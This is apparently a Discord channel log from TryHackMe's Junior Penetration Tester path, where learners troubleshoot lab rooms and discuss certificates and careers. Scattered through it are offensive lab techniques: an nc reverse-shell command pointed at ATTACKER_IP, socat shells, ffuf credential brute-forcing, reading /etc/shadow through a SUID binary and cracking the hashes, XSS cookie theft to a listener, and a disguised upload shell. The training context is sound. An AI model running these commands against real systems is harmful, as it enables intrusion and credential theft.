#junior-pentester-path

my flag is THM{SQL_INJECTION_3840}

for task 6

but it is not taking it as correct

am i doing something wrong? i finished the other tasks in the Blind SQLi room, but not step 6 , so that room is now ma first room that does not complete

in the login form, i got "You bypassed the login and can now move to the next level", so that looked good, but the flag presented when entered give me computer says no

try to type in the flag I also had an error when i pasted the flag

Anyone in Privilege Esccaltion Room?

I also feel the same. Started 20 days ago but i believe consistency is the key!

Exactly, keep it going! But don’t forget to stretch a bit, knowledge is important but health is more. Don’t over do it, could lead to burnout. That’s all, fell free to dm if you want

Which privilege escalation room is this?

Have you checked if there are extra spaces in the flag you copied?

Linux one

I think i need help with Windows AD. Its not letting me Remote Desktop Connect. Saying that the connection is conflicting with another connection?

keep getting this error:
The remote desktop server has closed the connection because it conflicts with another connection. Please try again later.

Which room ?

I was doing WIndows AD. But i figured it out from the instructions. SInce I ran the machine in my browser and i"m on linux. I didn't nor couldn't run RDP to connect. It was optional

Thanks for the assist though

the what the shell room is NOT 45 mins 😭

reading alone took me an hour to digest

My advice is to ignore that timer , it's useless 🙂 . Don't pay attnetion to it at all

yeah I knew that from a long time ago but setting it up as 45 mins is super funny to me haha

i am doing the room What the shell? I am experimenting with socat and when i set up the bind shell i have a connection like "0;@ip-10-10-23-94:~7;file://ip-10-10-23-94/root" why could it be? i connect to shell like this: socat TCP:10.10.120.15:4444 EXEC:"bash -li"

Hello guys, can anyone here help me with one question or better said help me get "unstuck"?

I am working on the optional challenge in the Upload Vulnerabilities room. (The jewel website)

I remove client-side checks for file upload, I've downloaded nodeJS reverse shell and adjusted its content to my port number 4444 and IP address, I have avoided the server-side check by MIME; uploading reverse shell as .jpg successfully. Enumerating /content directory with gobuster I can see that now there is additional jpg image, which my reverse shell. However, when I try to trigger it from /admin page by doing ../content/<imageName>.jpg it doesn't trigger the listener on 4444 port. I just get an error message "module does not exist". Am I missing something?

Hello Guys, I'm currently on the content discovery room. Task 6

I think that this URL: https://static-labs.tryhackme.cloud/sites/thm-web-framework is already dead?

Hey friends,
I’m stuck on Task 12 of the Burp Suite Intruder room (https://tryhackme.com/room/burpsuiteintruder?taskNo=12).
I understand the steps needed (macro for session + CSRF token, Pitchfork attack, etc.), but I can’t actually complete the brute-force because Burp Suite gets extremely heavy on memory and becomes unresponsive during the attack.
Has anyone found an efficient workaround for running this attack with such a large wordlist without crashing Burp?

Hi guys, I just completed the Jnr pen tester path. I wanted to know if there's anyone here who has taken the PT1 CERT EXAM?

Check out #pt1 exam 🙂

hey, i am new here, i just finished the JR pentester path, is there any suggestion of rooms and challenges that i can practise my skills on? i would love to have a list of 20 rooms for exemple that are easy to begin with

Try this one 🙂
https://tryhackme.com/room/smol

thanks!

Hello, I wanted to know if it's normal that I find the lateral movement and pivoting room extremely difficult even though it's supposed to be an easy room.

THM has a criteria on how to classify rooms in terms of difficulty. While that is 'standard', you may not have the needed background or requisite knowledge for the room.

Yeah it is a bit of advanced topic

can someone help me ?

sbmclient doenst work

for the roo lateral movement and pivoting

Based on the error though, it doesn't seem to be an smbclient error?

Yes i saw that, but i dont understand why it is doesn't works

I just followed thm room instructions

People

Does anyone want to play CTF?

Looking at the error alone, it seems to be an incorrect password

But the password is correct

guys can someone help me with task5 Linux Privilege Escalation room

?

@worthy tide yo

what's the issue ?

Hello I was on vulnerability 101 Task 4:
Using NVD, how many CVEs were published in July 2021?
Since i am not able to find full listing page on nvd and also since it is down i used wayback machine were the ans is 1585 but thm shows it as wrong ans can some one help

Which query did you use on NVD ?

on the curr nvd site i could not find the full listing option
So i went to wayback machine and got the old nvd page that had the full listing page and in that i went on 2021 july

.

Can you provide a screenshot please ?

That number still includes rejected CVEs.. you should unselect those in your filter.

You may wish to verify your account and post images instead (as folks won't simply click on links from random folks from the internet).

Hey I'm looking for a mentor or someone to go through this with as I feel I learnt better with someone than by myself, can send me a message, I'm a noob trying to learn

i cant wrap my head arround linux Privilege Escalation. Im dont know what to do mos times. Task 6 was the only one so far i could understand. But kernel and SUID i dont get it.
How you guys learn this stuff ?

What casuses the confusion 🙂 ?

it was multiple things tbh.
I was executing the GTFObins wrong. I didnt understood was bitsets means in the right context and how its connected with
"find / -type f -perm -04000 -ls 2>/dev/null" command.
But yesterday at work i watched 2 youtube videos that where explainign thses thing at a very core level. And it made click finally.
Know i understand what the command does and shows me and how to proper uses gtfobins and finished the labs

Just getting started, does the training path prep you enough to pass the cert or is additional training recommended ?

Is this a PT1 related question? If it is, suggest to post it on #pt1 for better traction.

Is this the correct training path for PT1?

Room called: What the shell, task 13 Q6/7
Hey guys is there a way to do this task, i cant get the powershell, i mean i can connect but when i type commands i dont get any answer

Which powershell reverse shell payload are you using?

Php Reverse shell modified, I changed de uname to make a power shell

And I can connect, but after I use a command I don't get any response 🙁

Got confused there. I thought you need to connect via Poweshell?

Hey

Anybody hopin' into Windows privilege Escalation >>

Lets do togethor

Same here onward to task 6 or 7 i took the help of writeups 🙁

does anyone know a good youtube channel walking through this path? not the ones that just show the solutions, i mean the ones that actually explain the stuff?

"The $ in SMB/CIFS URIs means that the share is hidden, and won't be displayed when browsing shared folders"

so why can I view the share names when running
smbclient -N -L //10.129.34.168

Check out @coarse pebble , he has some great content 🙂

Can you provide a shot please 🙂 ?

Hello, in the file inclusion room, challenge 3, we are to change the http request from get to post in order to bypass the string filtering. I see on online writeups that people use curl. I do the exact same using burp but it never works. The include function shows: include(.php).
Anyone has any idea why burp doesn't work?

How are you changing request method in Burp ?

Repeater > Inspector > Request Attribute > Method

Hello, can you suggest any additional "beginner friendly" labs where I can practice what I learned on the jpt path? I'm trying to combine THM and portswigger, do you have other suggestions? Thank you in advance

Check this one

https://tryhackme.com/room/basicpentestingjt

Can you please verify and provide some shots ?

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      test SMB v3.1
        IPC$            IPC       IPC Service (Test SMB server (Samba, Ubuntu))```

Anonymous login is probably allowed that's why you can list shares

Hi I hope that you’re fine
Please gys is the jpt free ?

Majority is but not the whole path

Does the jrpt cert include more training or just being a exam ?

For a cert. advice try to ask in #cyber-and-careers channel . This channel isn't as active as much

has anyone solved Vuln Capstone room?
I have downloaded the script but cannot execute RCE
Pls help meee, thanksss

Can you provide some shots please ?

i dont know how to use this exploit script
i dont understand the word "Vulnerability", what should i provide for that argument

ahh, i got it, tks

remove fuel from the cmd

Is this path enough to try PT1 ?

Sry read the reply to late, hope you getting better at it. I'm on windows priv escalation right now. How far u progressed so far ?

No , go on the link below and click on Recommended Learning to find the full learning path for PT1 , you also need a lot of practice

M done with tha

Thank you

Gave +1 Rep to @violet brook (current: #1 - 5922)

And made it click for your ? Or still need help on that topic?

I took help to understand

didn't rely only on THM --- To complete tha task i went over AI too

yeah same after 2 days in this module i watched a video of someone explaining piv escelation for dummies and then i clicked for me

Hello everybody

Any mercifull soul that could help me in a osint situation please? Still learning a bunch of stuff but I could really use some help

shoot, what's your question?

@soft yew mind if i send you a dm mate?

dont want to polute the chat with a bunch of questions

well, that's what the chat is all about. Kinda 😄

What's the issue ?

Ok ill explain

Im finishing my course on cybersecurity and the final project consists in finding public information about the school

The teacher told us to use a bunch of websites and whatever tools we want to use

The problem is that I cant find some stuff that he is asking in the project like public emails or documents like pdfs or .doc .xls

I already found ip adresses domains subdomains server software etc etc

I already use a couple of transforms from maltego

And other Kali Linux tools

Sorry can you explain better please?

Is that like Google dorks?

Yes

Yes I already use it

And the only thing I can find is a simple pdf file

My question is like: is there any other tool that could be more accurate? I dont know like… a specific tool?

You can find some on github

We can't help you with school work #rules

@hollow marsh we're you able to complete it? It keeps DOSing on me as well.

Ok… it doesnt make sense to me but thank you anyway

Gave +1 Rep to @violet brook (current: #1 - 5928)

Yeeeeah
2 Month of daily grind

Congratulationss buddy

Gz mate!

Thanks ❤️
The grind never stops

How was the exam? Like what style was it?

Great job , keep up the good work 🙂 🚀

Which exam ?

the PT1 exam?

hi im doing jr pentesting path and my attack box server is very far so ping is very bad i want to setup that lab in my pc as vm i have a fine spec pc 32 gig ram r5 5500 and gtx 1060 good enough for labs so i want someone to help me with it please cuz im really new to all this
i am in india fyi so .... yea i would love to have a meet or a call to help with setup
i already have kali , ubuntu and a wazuh vm ready

the screenshot is not from PT1 exam, it's the finish of the path Jr. Penetration Tester.

This isn't a PT1 channel , if you're interested in pt1 check out #pt1 🙂

hi can i know how to change this region to something else cause my attack box very laggy, i already try to changed in my "access" with EU-VIP but it doesnt effect anything

Server Region is under Profile > Manage Account > Account Details (https://tryhackme.com/manage-account/account-details)
after selecting a different choice, Save Changes button turns from greyed out to green

I see 👍

please tell here if things improve after changing your Server Region, that would help
thanks

Gave +1 Rep to @hexed creek (current: #3157 - 1)

woo tbh it much more better eventho it kinda laggy but still much better than before, thanks for the suggestions

Gave +1 Rep to @weary mesa (current: #13 - 798)

you went from US-East to Europe, I guess?

yup

eventho actually im in asian

but still acceptable

thanks budd

hello i am doing the linux priviledge escalation room in that the Task 11 I am getting this error when i am trying to run the compiled c code
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

@violet brook

check this (issue 2): #1377021985795870810 message

okay thank you

Gave +1 Rep to @weary mesa (current: #13 - 824)

I am new using tryhackme how to step step with deep knowledge of everything how to get how to study how to get this

Pre security. Your best bet is to pay for subscription. Because it’s a very detailed description on everything. You’re not gonna jump right into it and know everything. You gotta start from the very bottom. But pre security is your best bet. And well organized. Have fun!

Check out this article

https://tryhackme.com/resources/blog/free_path

hey guys, i wanna ask if i connect to my openvpn for exp EU-vip than my attackbox region is EU server does it have an impact on it such as no laggy ?

I would expect so
however, what matters in the end is how you experience it
About the Server Region, I have seen several users complaining that had a better experience after switching from "US-East (Virginia)" to "Europe (Ireland)"

When should I start this path?

I just started TryHackMe about two days ago and have gone through almost the whole pre-security pathway. (With free version)

I have no to little experience with cyber security/hacking.

You should finish Cyber101 path before this one

Ok thank you

Gave +1 Rep to @violet brook (current: #1 - 5947)

Is Cisco Ethical hacking course worth it?

Why not 🙂 ?

its not

why

its doesnt teach ethical hacking at all

and its too specific

.

Thank you for letting me know.
Do you recommend me any ethical hacking course as a beginner?
I thought about eJPT

Gave +1 Rep to @ornate pike (current: #3172 - 1)

I would recommend TryHackMe 🙂

Hey guys I am newbie in this field (have zero knowledge in IT)and I want to change career in ethical hacking how should I began.

have a look at THM roadmap: https://tryhackme.com/hacktivities?tab=roadmap

look at the thm roadmap, start with pre security then cyber security 101

its all in there

Linux and Windows Privilege Escalation has been the worst experience I have dealt with EVER

tbqh I have restarted the windows one having felt like i missed the point

Are you referring to the Tib3rius rooms?

https://tryhackme.com/room/windowsprivesc20 and https://tryhackme.com/room/linprivesc

Task 6 virtual hosts of subdomain Enumeration is giving me problems. I'm having no luck and been stuck on this lab for a while. I followed the instructions but still don't get the subdomain names. Any step by step? I'm not sure what I'm doing wrong

https://www.youtube.com/watch?v=8UOr0AWSxlc

Agreed. This is the one I'm stuck on because the Windows machine simply won't launch.

My attack box does but the wprivesc2_v1.1 doesn't appear at all. I tried two browsers, cleared cache, relogged..nothing helps.

It's like my last one for this path too so quite annoying. Had to go through the whole part 3-5 with a weird bug where it was constantly right clicking on its own and I had to alt tab constantly to fix it..

for the target VM, have you used RDP to connect to the target, as a workaround?

that weird bug, is that a paste popup window appearing all the time? if so, please check this past message: #site-support message

I’ve tried but it asks for a domain name with remmina and I’m not sure how to find that but I will try again

Maybe I’m doing it incorrectly

Oh thank you! Yes it was!

Gave +1 Rep to @weary mesa (current: #9 - 973)

in my experience, no need for a domain, just enter the IP

as per screenshot

Thank you! Appreciate it

Gave +1 Rep to @weary mesa (current: #9 - 974)

Hi all. I've come across a really annoying bug in the "Walking an application" room. When I try to enter the flag for the fifth and final task, it keeps automatically inserting an underscore in the wrong place so I can't successfully submit. Doesn't matter if I manually type the flag or try to copy/paste. Anyone come across this before? I've tried switching browsers and logging out/logging back in to no avail.

Not even refreshing the browser worked?

Nope. It's weird. I'm on an Ubuntu laptop. Maybe I need to try my Windows machine.

yea im having the same issue

hello. in the https://tryhackme.com/room/passiverecon room at task no 6 this question : Based on Shodan.io, what is the 3rd most common port used for nginx? requires the answer 5001. but the current 3rd most common port, that if my way of telling that is not wrong, is 888.

https://www.shodan.io/search/facet?query=nginx&facet=port

@modest arch @winged lotus it may be the wrong flag also
you are welcome to share it here, but avoid spoiling by inserting it inside double pipes like this || secret flag ||

that is an issue with data that is dynamic
you may want to add your contribution to the bug report about this: #1358767203830333592 message

try googling the room name but at the top select "videos" or just go to youtube & search for your room name & look for one of the longer videos (use right click so you can check out several) & find one that sections the work by Task #1 - some explain really well, but some just zip through, so find one that explains & follow along & likely see where you stepped off the beaten path.

The last task in that room is Task 6 is that what you are referring to? If so, its not a bug - you are not done - the one you found is red herring. Keep going & follow all the steps.

THM VM is all on their site - how you access it makes no difference except for maybe speed/latency.

Is the flag not || THM{HEADER_FLAG} || ?

Yes I meant to refer to Task 6. I shared what looks to be the flag in my last message to @weary mesa.

that is not the flag THM wants I suggest you check the Hint

Wassup

What's up everybody! Totally new here and posting because I'm getting pretty frustrated. I'm on Local File Inclusion, Task 4, and I'm really confused as to how I'm supposed to get to the answer. I've got the Attackbox on, I've entered in the filename that I'm looking for in their search bar, but the output is nothing like what the answer is looking for. What exactly am I supposed to do?

Ask echo

Well after almost what felt like an eternity I have just managed to successfully complete the Junior Pen-tester Path. It was soooo difficult but very informative and well worth the hard work. I have enjoyed every minute. It must have taken me closer to 60 hours to complete rather than the stated average of 30 hours, but the time just flew by really quickly. 😃

congrats, nice job 🥳

What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. - I don't seem to understand this question. Is there a user called 'penny'?

correct.

Hi people

In the vulnerability 101 room task 4 they are asking for number of cves published in july 2021 on nvd plat but even if i put the right number thats 1585 its nit working i finished the room but this task is blocking me

When putting the filter on the date, you get 1585, there is another filter you need to add to get the correct number

I put the range from 1 to 31 july if 2021

What more filter should i add

Click through the different categories when modifying the filter, it will be obvious when you see the option

I got it

Ty

Done!

Done!

In Authentication bypass room, i am getting all error while brute forcing. did this happened to anyone else or I am doing any mistake?

Have you checked this?
Note: If you created your valid_usernames file by piping the output from ffuf directly you may have difficulty with this task. Clean your data, or copy just the names into a new file.

I made it manually in the directory and also again from the terminal yet its giving all error. i have tried almost 3/4 times

can you copy paste your command here?

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200 copied this command and paste exactly, i think its having problem in the username file but i checked that yet its all giving error.

is the machine still up and running? Do you see machine information at the top of the page? if not, start the machine in task 1

yeah while doing the room machine was running. i checked the url, can't understand where's the problem

Change machine_IP with the IP of the room:
http://machine_ip/customers/login

well i did this, machine is not running rn thats why its showing machine ip but when i did then there was ip. its not the issue.

and check the location of the password file, if this is correct on your machine

the password file was in the root directory and so the username file. i have watched some videos also but even doing exact same mine is not working, it's testing but showing all error

Did the room again untill brute force, had to change the password file location, after that it works.
I think it's the SecLists in the path that's giving the issue

try with this(but check if file path is the same on your machine): /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt

okay. Thanks btw

Happy to help and good luck!

hello, i am doing the Windows Privilege Escalation - junior. and on task 4 i need to use this command in powershell. C:> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat i get an error. i watched a walkthrough video on youtube, i can't see any mistakes on my part. where can i get help?

i tried putting this "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444" between comma as perplexity and chatgpt said, but while the command works, i get nothing on the listener

To confirm, the nc executable you are using came from where? Also, have you checked that you are using the correct version? If I recall it correctly, there is only one version of nc that accepts the -e parameter

From the vm ... I didn't upload anything. And the listener i opened was on the attackthebox. I didn't use rdp or ssh for this exercise.

i found out my mistake.... the command should have been run in cmd not powershell

Didn't find an instance where it said this, but only there works

Are there other TryHackMe rooms like https://tryhackme.com/room/lofi

https://tryhackme.com/room/walkinganapplication?taskNo=3&sharerId=6874420a1f0f8f3a8dfd0256

Hi guys. Please help me i'm stuck on this task since 1 week

The two last flags

Idk how to find the flag

I've viewed the page source codes but i don't still found the flags

No body wants to help me?

Dm me maybe i can

Or describe completely

the privileges escalations is rough

Please be patient as folks here are mostly volunteers.

Okay thanks

Gave +1 Rep to @hollow venture (current: #3244 - 1)

Oh ok

guys in the privileges escalation room task 7 we have to look for a way to read /etc/shadow and /etc/passwd in the thm example they used nano but we cant do same because there is no nano file when we look for it by doing find / -type f -perm -04000 -ls 2>/dev/null but i searched for the solution and ive found that they used base64 that have a s bit set and we can exploit that by using gtfobins ok butt i cant i dont understand how to do it i cant use sudo the user isnt a sudoer so i cant use nano too i dont know how to do that furthermore the example they give us on thm was not that accurate let me know if i missed somehting

with base64 having the SUID bit, gtfobins tells you how you can read a file like /etc/shadow

ok ive found the hashes

but now i cannot do any with thses hashes

why?

bcs i dont ahve any permission

ive seen that someone in the walktrought that put the hash in a file called literraly hash and then used it to crack it with john the ripper

id even know if i can use john

i missed somethi9ng meybe but i dont think

@weary mesathats why

/etc/shadow contains password hashes, try to crack them, with the goal of moving from user karen to another user

@weary mesa i just dont know how to do it if i cant use any tool

the "Cyber Security 101" learning path has a module that covers that, in particular the room for John the Ripper, as per screenshot
if you do not have that expertise, use google/chatGPT/whatever so you can do online cracking
if you are stuck, use the following hint: || here is a resource for online cracking: hashes.com ||

Can anyone help me, I have completed the authentication bypass (Jr. Pentester) room in try hack but I completed that in the lab but how to test it in the real website using fuff tool, please anyone help me

@weary mesa i have the hashes but i cant put them in any files to use john how am supposed to crack it lol

you use john on your attackbox, i. e. your own local machine or the in-browser attacking machine provided by THM
you do not run john in the target VM
john is one of these tools you carry along in your hacking toolbox 🙃

Ure right ty

Hey I have some questions about atopic I didn’t fully understand in the
authentication bypass
Task 4 - logic flow
If anyone can help me understand

I’ll try to elaborate maybe it will help with the answers
In the task 4 it says the author understands he need to sent curl with the right string to somewhat inject to the php?
So I’m not familiar with php or with how did he got to that
It’s pretty simple watching what he did as an answer but I want to understand the path he took to know what to do there

hello guys i wonder if the jr pen tester certificate has an expiration date

Yes, it is valid for three years after which it needs to be renewed

https://tryhackme.com/certification/junior-penetration-tester (see FAQ section)

alr ty

Done!

Done!

Learning a lot with THM, probs will do this path next.. my question is “is this cert actually good for anything?”.. I wasn’t expecting it to be and am doing it out of personal interest, but I figured at most I’d put it as a post on LinkedIn..

Like I said at most, but curious other people’s exp

might be some discussion about that in #pt1 🙂

Who got time for that?

i am just 3 rooms from completing this room

Hi I am Naruto Uzumaki ... I would like to ask something... Is this junior-pentester path even worth it.....

What are ur personal experiences

Probably for your skill level, but not for recognition.. THM is a 7/10 learning platform but the certs don’t mean anything to employers

ohh

I'm on a 26 day streak and just started the JPT path. I'm also studying the network and security+ simultaneously. I like the training platform but I get it doesn't mean much to employers.

I thinks it’s the certs that don’t mean much and our system revolves around pieces of paper. Get your certs that mean something, but what you learn in THM will mean something as well.. but you need to get to the place where you have the chance to “show what you know”..

Every path has its struggle, pick yours. You could be the kid who scratches and claws for his degree to mean something and scathed his way through a 4yrs bachelors (more common than you know)… then fails the skills portion and finds getting employed hard because of it.

Then he finds himself needing to circle back and get certified because of it, in spite of having a degree.

If no degree, networking means something way more, and that doesn’t mean “playing fake” and shaking hands at coffee hours, you should be attending clubs, hackathons, open source projects and conferences like your life depends on it.. don’t be pushy, but these are open to the public spaces where you have a chance to “show what you know”

Some of the people you meet there will be in a position to extend offers or communicate with people who can.. if you are who you need to be at that time. If you keep building your skills you’ll reach point where people are surprised you’re not employed in the field, or not in this position.. then when opportunities arise your name will be one of the first to come up.

Most of all don’t become jaded because what you think you “deserve” doesn’t fall in your lap (not saying you are but it’s common).. people with zero experience join this field because they think it’s an easy six figures, if your truely passionate about the subject the first few years of leg work shouldnt mean much (of course it sucks)… but your interest should get you through that portion…

I honestly think the field becoming oversaturated is a good thing in a round about way, it will drive out the people looking for easy paychecks with a paid yoga hour. And good because those are the people who skate the second they find a place to do so.

It’s not what you can do in 3 months that counts, it’s what you can sustain for years on end and still be enthusiastic about.

Or somehow ascend to upper management and don’t have a clue what they’re talking about, thus making life harder for everyone else for reasons that literally make no sense or are counterproductive.

Thank you, thats very insightful. Im actually working on network, security, and then pen test+ and using THM as a practice/learning room.

Also in the process of setting up VMs to practice on when im ready.

how can i enable copy/paste from my host machine to tryhack me machine

The directions of burpsuite intruder on last task is a puzzle to me luckily there is AI but it could be easier to understand.

Anyone suggest what I do for pentester intership

That's a first there is pentest internship?

And here I thought all jobs for pentesting is at least 2+ years experience,

Are you using the Attackbox or your local VM as an attack machine?

You may want to head over to #cyber-and-careers and folk there might be able to point you to the right direction

Hello friends, I´m wondering how hard can PT1 cert be if attempted right after finishing Jr Penetration Tester path. Is it doable, or it escalates too much in difficulty?

Hello Guys,

Under the jr pentester path I'm currently doing the File inclusion module (Jr Penetration Tester -> Introduction to Web Hacking -> File Inclusion)

The last section of this module is challenges, which I'm unable to figure out without referring to walkthroughs on medium. What is that I could be doing wrong and how can i bridge this skill gap?

More than likely just exposure and repetition, unless you did the “intro to cyber” path, a lot of these concepts are going to be your first introduction to them.. expecting one or yourself to be able to accomplish each task flawlessly after a simple read through is not necessarily realistic

Can download you own VMs set up and attacker and target and attacker box and run reps

Just see everything as exposure to the material until you finish JR then go back and rep what you didn’t retain.. nothing wrong with walkthroughs as long as you use it to identify what you don’t know and go practice it until you know it

In the grand scheme of things even if/when you pass PT1 if you decide to go that route, you’ll still be at a “have been exposed to the material” level and not much more.. unless you decide to do more practice in your own time.. I’m basing that off of the pathway THM provides alone.

I had to consult a walkthrough for Linux Priv Escal and the dude who makes the walkthrough is a professional in the field, and he was getting frustrated.. albeit he doesn’t edit out his mistakes and solves them in real-time which most walkthroughs don’t provide..

Thank You @tranquil compass - Appreciate your feedback... it makes sense... Yes I'll be aiming for the PT1 in the coming year....i plan to do the all the recommended materials that was highlighted in PT1 learning resources in addition to the Jr Pen tester path. Thank you once again.

Gave +1 Rep to @tranquil compass (current: #3307 - 1)

Hey! I am facing some issue with Bypassing UAC room so when i starts the machine its constantly "reconnecting with remote machine" its says, so i terminate it and starts again and again 3 to 5 times but same issue and I'm unable to rdp it through my vm and also with attackbox and in the end i got this...
Please help me what's going on is it my mess or something else.
Thanks

Hi,
I shared a new post on my TryHackMe learning progress.

Post link:
https://www.linkedin.com/posts/hasanalih_tryhackme-cybersecurityjourney-learningeveryday-activity-7401506109276229633-t0jo

hey guys i have a question. I'm doing the linux privilege escalation room and for some reason on Task 5 whenever i try to use wget to grab the exploit file from my python http-server it tells me that write permission is denied

wondering if anyone would be willing to help me

I would imagine you need to change write permissions on the file, do you know the command?

yeah I figured it out thank you! @radiant gale

nice

wowowowow..

How was this solved, guys?

I went through that yesterday, and I didn't experience any problems

I am experiencing the exact same problem as this one @ornate flame but I think it's my own cookie my net cat listener grabs...

After firing up the listener, and grabbing the cookie in that request, did you not just decode it and submit as answer??? @ornate flame

I'll have a look in an hour, on the road rn

Its with the staff session cookie right?

Yeah. I decode the cookie I grabbed from the listener, and submit that as answer. But get a lot of errors, including incorrect answer and expected answer format is different.

Only include the last part

Don't include the staff session bit

cookie=eggh6755fghj886xxcvh76543edg

I decode the value, and I get something like:
session=efoow9873yeghs9277shs

I submit only the value, but get the error..

The exact error is:
``Uh-oh! The answer you provided may not be in English. Please review it and try again..```

On other instances, I just get incorrect answer as the error message.
@ornate flame

what steps did you take to get that cookie, because it is most definitely not correct

Okay so.

You should get something like this from the netcat listener.

cookie=dGhpcyBpcyBhIHJhbmRvbSBiYXNlNjQgc3RyaW5n

(not the actual cookie)

which you then need to decode (base64)

then you get:

staff-session=4CD305E55956197690F02D6G8FD2A321

(not the actual session token)

then you need to put 4CD305E55956197690F02D6G8FD2A321 into the thm question.

When i decode what I get, I get session=hsjsj3837eyehjs9s8h

and not staff-session= 2388shdnks99wjssbhskw98

The moment I submit the payload into the field for the ticket creation, I get a response on the netcat listener... I don't think that should be the case. I should get a listener connection when an admin views the created ticket instead, right??? @ornate flame

I fire up the netat listener as instructed, and then I used the payload in the input field of the create ticket button. Upon clicking on create ticket, there is a cookie captured in the listener already. (This cookie likely belongs to the same logged-in user I created at the beginning of the task)

that cookie must be ignored.

You need to put the xss line into the field when you create the ticket

once thats done

click on the ticket ID

and you should get the results in the terminal were you ran the nc command

Hi, I'm having this same issue. I tried changing the perms - but it's still happening. Can you advise how you resolved?

Please does anyone know how I can fix this

Premium but not working

Anyone solved challenge 3 in file inclusion room? I got stuck

Hello guys, I am new to TryHackMe. I started my journey in nov. And i am super excited to become a pentester. I know it's gonna be hard and it will take time, and I am ready. Right now, I know Linux (basic, ofc), and some basic things here and other. NGL when I used Wireshark and Metasploit, i was sooooo happy, and when i solved some questions all alone, that feeling dayum better than playing Valorant. I hope all newcomers like me enjoy, and I request my seniors to help us noobies.

@modern monolith im doing the same but I'm on network on the 101 path

looking forward..........

Nice bro, same here looking forward.

I want to retake my finished junior path again. How can I do it?

Reset each room one by one, or create a new account.

i been thinking bout doing this also. my memory sometimes is like a gold fish haha

#Script kiddie

Don't forget to take notes as you work on rooms.

Almost 90% through this path and I plan to complete it within the next few days. Also, Burp Suite is very 🆒 .

Do check Caido and OWASP Zap as alternatives

I am now officially on this path and i figure it will take me at least 5 to 6 months to complete considering the recent cybersecurity 101 took me 4 months to complete. I take my time i am in a hurry but i also for the sake of my mental health dont want to burn myself out. Cramming everything in a matter of days and endless hours to me is very unproductive these days its more focus and discipline and focus on completing one module at a time rather than speed running through all of it. But that is just me.

Gotcha, will do!

I am doing task 3 in the Nmap Live Host Discovery Room. I cannot find the Start Machine button for some strange reason. There is only one button for the static site in Task 2

There's a start attackbox button below the room title, in the page header

I am looking for the button to start the Start Machine button to start my target ip.

You dont really need a target machine to answer these questions

Thanks. I just checked again.

Doing the nmap advanced scanning room. I am trying to do an Ack scan but the results arent showing anything.

I have tried using sudo nmap -sA <Target IP>
I also tried sudo nmap --scanflags ACK <Target IP> but no ports are showing up. I have also reset the machine multiple times to no avail

have you tried with -p- to scan for all ports maybe its not within the default ports that nmap scans for

Okay I will try to do so. Thank you

Gave +1 Rep to @craggy pilot (current: #3476 - 1)

It says all ports are unfiltered which is not right

it was a guess from my part what you could try.

its okay let me take a break and try again later. Could be a connection problem

Why do you think it's not right?
TCP ACK scan is only useful for finding out whether a firewall is blocking certain ports or not. So, ports are going to show as filtered or unfiltered. Filtered means the ACK didn't receive a response as it was blocked by a firewall. Unfiltered means the ACK reached the target port and a RST was received. So, it wasn't filtered by a f/w. An usollicited ACK always results in a RST (reset) regardless whether or not a service is actually running on that port. This is why a TCP ACK scan is only useful for figuring out firewall rules and not for finding out actual target port or service state.

It eventually worked. I am not sure why the scan was not completing. It would say all ports are filtered. I had issues with scans not completing in that particular room and had to restart my machines a lot

Why do I not see the flag here:

Did you finally succeed?

Cause I am also stuck there i don't seem to find the flag

nope

Still waiting on someone who can help me out

Keep going mate you are gonna figure it out, I already did

Can I then have a hint ???

One of the headers in your packet has an incorrect value. I think you might have been over-editing the packet?

hmm, I only changed the get to POST
And added the content-type one

So one of those two must be it

now experimenting which one because right now I do not have a idea

@daring cradle

and added the file line

You know that if you right-click on the request packet in repeater you can choose "change request method" and it will change it to POST for you. So, there's really not much manual editing necessary here.

oke

but the repeater is a good choice ?

absolutely

oke

will try that way

right now I changed the method in the proxy

Are you South Afrikan or Dutch.
Your name almost looked like Dutch words
@daring cradle

Belgium 🇧🇪 😀 🍺 🍫

aha, im from East Netherlands

will try it after the sqlmap is ready
is very very slow in attackbox

🙁

gtg and eat

gtg ??

got to go

sry

enjoy the meal

@daring cradle still no flag

Content-Type is correct now, but your POST url is now wrong (previously it was correct).

I tried that one too but then got a 404
Will try tommorrow again. It is now time to sleep

just finished this whole path

@daring cradle still no luck

oke

A error:

<br />
<b>Warning</b>:  include() [<a href='function.include'>function.include</a>]: Failed opening '/etc/flag1' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in <b>/var/www/html/lab1.php</b> on line <b>26</b><br />

Your POST url is almost correct

😢

no ideas what to change

If you want I can tell you how to do it in Burp, because I think you are editing more than should be necessary

is one of the problems that before the challenges part must be a / ?

yes the leading / is missing

I try it the whole time in Burp

oke, I started up attackbox to try

but the /etc/flag1 must that now be in the URL
or as last in the request

and I do not change it
If burp changes the method the challenges part disappear

Just browse to the page and enter "/etc/flag1" and click include. Then find the request in Burp and send it to repeater, then in repeater right click in the request and select "change request method", then send it

oke

like this you dont need to do any editing

oke

burp is now starting on the attackbox

oke, now chancing the method

and the first flag
Finnaly

now thinking how and where I can change cookies

for flag2

some thinking to do
Change the cookie to administrator but then I see a message "welcome administrator" but also a warning

time for a break

I'm stuck on the final challenge (RFI/RCE) for File Inclusion: https://tryhackme.com/room/fileinc
I think I understand generally what I could do - host a malicious file with ngrok and coerce the app to include it - but as far as I can tell, the target VM has no connectivity to any other hosts, so I can't get it to include anything even with HTTP. Am I missing something? This seems like a huge leap from anything I've been asked to do on this path so far

I am finally on this this pathway i hope to complete this by the summer and take the PT1 since the cybersecurity 101 path took me 4 months to complete, unlike most i dont rush i take my time and beside cramming everything as fast as possible doesnt help.

And don't forget to take notes of what you did or learned on each room.

I know i go slow not in a rush.

Why ngrok? You can just use a simple python http server.

python3 -m http.server 80

Currently Studying the Advanced SQLi Room but I can’t access the website MACHINE_IP/second/add.php (and yes i started the machine snd used the ip address for the target provided) did it twice on the AttackBox same issue.
Am i doing something wrong? Or is it a THM issue

